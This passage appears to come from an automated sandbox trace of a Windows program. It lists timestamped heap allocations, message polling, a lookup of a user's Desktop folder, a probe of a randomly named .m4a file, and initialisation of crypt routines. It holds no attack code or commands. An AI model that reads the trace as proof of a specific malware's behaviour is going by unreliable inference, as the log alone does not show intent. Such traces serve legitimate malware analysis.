RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0129.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0129.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0129.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0129.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0129.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0129.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0129.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0129.929] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0129.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0129.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0129.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0129.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0129.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0129.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0129.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0129.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0129.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0129.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0129.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0129.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0129.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0129.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0129.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0129.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0129.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0129.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0129.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0129.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0129.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0129.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0129.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0129.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0129.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0129.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0129.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0129.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0129.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0129.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0129.968] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0129.968] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0129.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0129.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0129.969] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/2a44Hi4EE Lmnc.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f960f0, ftCreationTime.dwHighDateTime=0x1d5e84f, ftLastAccessTime.dwLowDateTime=0x3785f910, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x3785f910, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x1651a, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="2a44Hi4EE Lmnc.m4a", cAlternateFileName="2A44HI~1.M4A")) returned 0xa87290 [0129.970] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0129.970] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0129.970] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0129.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0129.971] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0129.971] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0129.971] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0129.971] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0129.971] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0129.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0129.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0129.972] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0129.973] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0129.973] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0129.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0130.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0130.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0130.076] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0130.076] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0130.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0130.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0130.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0130.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0130.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0130.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0130.077] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0130.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 